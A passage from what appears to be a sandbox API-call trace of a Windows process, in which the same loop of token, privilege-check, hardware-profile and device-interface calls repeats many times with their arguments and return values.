0x3 [0085.149] GetLastError () returned 0x578 [0085.149] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.149] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.149] GetCurrentThread () returned 0xfffffffe [0085.149] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.149] GetLastError () returned 0x3f0 [0085.149] GetCurrentProcess () returned 0xffffffff [0085.149] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.149] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.149] SetLastError (dwErrCode=0x522) [0085.149] CloseHandle (hObject=0x114) returned 1 [0085.149] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.149] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.149] GetLastError () returned 0x578 [0085.149] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.149] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.149] GetCurrentThread () returned 0xfffffffe [0085.149] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.149] GetLastError () returned 0x3f0 [0085.149] GetCurrentProcess () returned 0xffffffff [0085.149] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.149] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.149] SetLastError (dwErrCode=0x522) [0085.149] CloseHandle (hObject=0x114) returned 1 [0085.149] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.149] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.149] GetLastError () returned 0x578 [0085.149] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.149] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.149] GetCurrentThread () returned 0xfffffffe [0085.149] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.149] GetLastError () returned 0x3f0 [0085.149] GetCurrentProcess () returned 0xffffffff [0085.149] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.149] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.149] SetLastError (dwErrCode=0x522) [0085.149] CloseHandle (hObject=0x114) returned 1 [0085.149] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.149] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.149] GetLastError () returned 0x578 [0085.149] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.149] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.149] GetCurrentThread () returned 0xfffffffe [0085.149] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.149] GetLastError () returned 0x3f0 [0085.149] GetCurrentProcess () returned 0xffffffff [0085.149] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.150] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.150] SetLastError (dwErrCode=0x522) [0085.150] CloseHandle (hObject=0x114) returned 1 [0085.150] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.150] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.150] GetLastError () returned 0x578 [0085.150] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.150] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.150] GetCurrentThread () returned 0xfffffffe [0085.150] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.150] GetLastError () returned 0x3f0 [0085.150] GetCurrentProcess () returned 0xffffffff [0085.150] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.150] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.150] SetLastError (dwErrCode=0x522) [0085.150] CloseHandle (hObject=0x114) returned 1 [0085.150] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.150] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.150] GetLastError () returned 0x578 [0085.150] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.150] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.150] GetCurrentThread () returned 0xfffffffe [0085.150] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.150] GetLastError () returned 0x3f0 [0085.150] GetCurrentProcess () returned 0xffffffff [0085.150] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.150] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.150] SetLastError (dwErrCode=0x522) [0085.150] CloseHandle (hObject=0x114) returned 1 [0085.150] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.150] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.150] GetLastError () returned 0x578 [0085.150] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.150] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.150] GetCurrentThread () returned 0xfffffffe [0085.150] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.150] GetLastError () returned 0x3f0 [0085.150] GetCurrentProcess () returned 0xffffffff [0085.150] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.150] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.150] SetLastError (dwErrCode=0x522) [0085.150] CloseHandle (hObject=0x114) returned 1 [0085.150] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.150] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.150] GetLastError () returned 0x578 [0085.150] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.150] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.150] GetCurrentThread () returned 0xfffffffe [0085.151] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.151] GetLastError () returned 0x3f0 [0085.151] GetCurrentProcess () returned 0xffffffff [0085.151] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.151] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.151] SetLastError (dwErrCode=0x522) [0085.151] CloseHandle (hObject=0x114) returned 1 [0085.151] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.151] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.151] GetLastError () returned 0x578 [0085.151] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.151] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.151] GetCurrentThread () returned 0xfffffffe [0085.151] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.151] GetLastError () returned 0x3f0 [0085.151] GetCurrentProcess () returned 0xffffffff [0085.151] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.151] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.151] SetLastError (dwErrCode=0x522) [0085.151] CloseHandle (hObject=0x114) returned 1 [0085.151] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.151] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.151] GetLastError () returned 0x578 [0085.151] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.151] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.151] GetCurrentThread () returned 0xfffffffe [0085.151] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.151] GetLastError () returned 0x3f0 [0085.151] GetCurrentProcess () returned 0xffffffff [0085.151] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.151] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.151] SetLastError (dwErrCode=0x522) [0085.151] CloseHandle (hObject=0x114) returned 1 [0085.151] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.151] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.151] GetLastError () returned 0x578 [0085.151] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.151] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.151] GetCurrentThread () returned 0xfffffffe [0085.151] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.151] GetLastError () returned 0x3f0 [0085.151] GetCurrentProcess () returned 0xffffffff [0085.151] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.151] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.151] SetLastError (dwErrCode=0x522) [0085.151] CloseHandle (hObject=0x114) returned 1 [0085.151] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.151] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.151] GetLastError () returned 0x578 [0085.152] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.152] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.152] GetCurrentThread () returned 0xfffffffe [0085.152] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.152] GetLastError () returned 0x3f0 [0085.152] GetCurrentProcess () returned 0xffffffff [0085.152] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.152] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.152] SetLastError (dwErrCode=0x522) [0085.152] CloseHandle (hObject=0x114) returned 1 [0085.152] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.152] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.152] GetLastError () returned 0x578 [0085.152] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.152] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.152] GetCurrentThread () returned 0xfffffffe [0085.152] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.152] GetLastError () returned 0x3f0 [0085.152] GetCurrentProcess () returned 0xffffffff [0085.152] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.152] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.152] SetLastError (dwErrCode=0x522) [0085.152] CloseHandle (hObject=0x114) returned 1 [0085.152] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.152] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.152] GetLastError () returned 0x578 [0085.152] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.152] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.152] GetCurrentThread () returned 0xfffffffe [0085.152] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.152] GetLastError () returned 0x3f0 [0085.152] GetCurrentProcess () returned 0xffffffff [0085.152] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.152] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.152] SetLastError (dwErrCode=0x522) [0085.152] CloseHandle (hObject=0x114) returned 1 [0085.152] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.152] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.152] GetLastError () returned 0x578 [0085.152] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.152] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.152] GetCurrentThread () returned 0xfffffffe [0085.152] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.152] GetLastError () returned 0x3f0 [0085.152] GetCurrentProcess () returned 0xffffffff [0085.152] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.152] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.153] SetLastError (dwErrCode=0x522) [0085.153] CloseHandle (hObject=0x114) returned 1 [0085.153] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.153] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.153] GetLastError () returned 0x578 [0085.153] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.153] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.153] GetCurrentThread () returned 0xfffffffe [0085.153] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.153] GetLastError () returned 0x3f0 [0085.153] GetCurrentProcess () returned 0xffffffff [0085.153] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.153] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.153] SetLastError (dwErrCode=0x522) [0085.153] CloseHandle (hObject=0x114) returned 1 [0085.153] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.153] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.153] GetLastError () returned 0x578 [0085.153] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.153] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.153] GetCurrentThread () returned 0xfffffffe [0085.153] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.153] GetLastError () returned 0x3f0 [0085.153] GetCurrentProcess () returned 0xffffffff [0085.153] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.153] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.153] SetLastError (dwErrCode=0x522) [0085.153] CloseHandle (hObject=0x114) returned 1 [0085.153] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.153] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.153] GetLastError () returned 0x578 [0085.153] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.153] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.153] GetCurrentThread () returned 0xfffffffe [0085.153] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.153] GetLastError () returned 0x3f0 [0085.153] GetCurrentProcess () returned 0xffffffff [0085.153] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.153] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.153] SetLastError (dwErrCode=0x522) [0085.153] CloseHandle (hObject=0x114) returned 1 [0085.153] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.153] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.153] GetLastError () returned 0x578 [0085.153] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.153] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.153] GetCurrentThread () returned 0xfffffffe [0085.153] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.153] GetLastError () returned 0x3f0 [0085.153] GetCurrentProcess () returned 0xffffffff [0085.153] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.153] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.153] SetLastError (dwErrCode=0x522) [0085.154] CloseHandle (hObject=0x114) returned 1 [0085.154] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.154] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.154] GetLastError () returned 0x578 [0085.154] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.154] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.154] GetCurrentThread () returned 0xfffffffe [0085.154] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.154] GetLastError () returned 0x3f0 [0085.154] GetCurrentProcess () returned 0xffffffff [0085.154] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.154] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.154] SetLastError (dwErrCode=0x522) [0085.154] CloseHandle (hObject=0x114) returned 1 [0085.154] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.154] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.154] GetLastError () returned 0x578 [0085.154] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.154] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.154] GetCurrentThread () returned 0xfffffffe [0085.154] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.154] GetLastError () returned 0x3f0 [0085.154] GetCurrentProcess () returned 0xffffffff [0085.154] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.154] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.154] SetLastError (dwErrCode=0x522) [0085.154] CloseHandle (hObject=0x114) returned 1 [0085.154] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.154] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.154] GetLastError () returned 0x578 [0085.154] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.154] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.154] GetCurrentThread () returned 0xfffffffe [0085.154] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.154] GetLastError () returned 0x3f0 [0085.154] GetCurrentProcess () returned 0xffffffff [0085.154] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.154] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.154] SetLastError (dwErrCode=0x522) [0085.154] CloseHandle (hObject=0x114) returned 1 [0085.154] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.154] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, 